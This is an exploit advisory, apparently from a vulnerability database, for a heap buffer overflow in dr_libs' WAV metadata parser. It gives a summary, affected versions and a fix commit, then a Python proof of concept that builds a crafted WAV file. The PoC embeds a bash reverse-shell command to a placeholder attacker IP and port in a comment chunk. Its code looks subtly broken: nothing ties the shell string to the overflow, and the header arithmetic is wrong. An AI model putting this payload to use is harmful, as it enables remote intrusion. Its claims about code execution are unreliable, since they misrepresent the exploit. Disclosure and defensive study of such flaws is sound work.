Vulners
Lucene search
📄 dr_libs 0.14.4 Heap Buffer Overflow
=============================================================================================================================================
| # Title : dr_libs ≤ 0.14.4 via crafted WAV smpl chunk Heap Buffer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/mackron/dr_libs/ |
=============================================================================================================================================
[+] Summary : A heap buffer overflow exists in the function drwav__read_smpl_to_metadata_obj() when processing WAV files with a crafted smpl chunk.
The vulnerability arises due to a mismatch between sampleLoopCount validation in pass 1 and unconditional processing in pass 2, allowing 36 bytes of attacker-controlled
data to overflow heap allocations via any drwav_init_*_with_metadata() call on untrusted input.
Affected versions: 0.14.4 and earlier
Fixed in: commit 8a7258c
Impact: Memory corruption, potential arbitrary code execution
Trigger: WAV files with manipulated smpl chunk metadata
Mitigation: Update dr_libs to a version newer than 0.14.4.
[+] POC :
import struct
def pad_even(data):
if len(data) % 2:
data += b'\x00'
return data
def generate_wav():
ATTACKER_IP = "192.168.1.5"
PORT = "4444"
cmd = f"bash -c 'sh -i >& /dev/tcp/{ATTACKER_IP}/{PORT} 0>&1'\x00"
cmd_bytes = cmd.encode()
sample_rate = 44100
channels = 1
bits = 16
byte_rate = sample_rate * channels * bits
block_align = channels * bits
fmt_chunk = (
b'fmt ' +
struct.pack('<IHHIIHH',
16,
1,
channels,
sample_rate,
byte_rate,
block_align,
bits
)
)
payload = struct.pack('<9I',0,0,0,60,0,0,0,0,0)
smpl_chunk = b'smpl' + struct.pack('<I', len(payload)) + payload
smpl_chunk = pad_even(smpl_chunk)
audio_data = b'\x00\x00' * 44100
data_chunk = b'data' + struct.pack('<I', len(audio_data)) + audio_data
data_chunk = pad_even(data_chunk)
comment = cmd_bytes
comment_padded = pad_even(comment)
info_chunk = b'ICMT' + struct.pack('<I', len(comment)) + comment_padded
meta_data = b'INFO' + info_chunk
meta_chunk = b'LIST' + struct.pack('<I', len(meta_data)) + meta_data
meta_chunk = pad_even(meta_chunk)
wave_data = b'WAVE' + fmt_chunk + data_chunk + smpl_chunk + meta_chunk
riff = b'RIFF' + struct.pack('<I', len(wave_data)) + wave_data
with open("fixed.wav", "wb") as f:
f.write(riff)
print("[+] WAV file generated successfully")
generate_wav()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2026 00:00Current
6.1Medium risk
Vulners AI Score6.1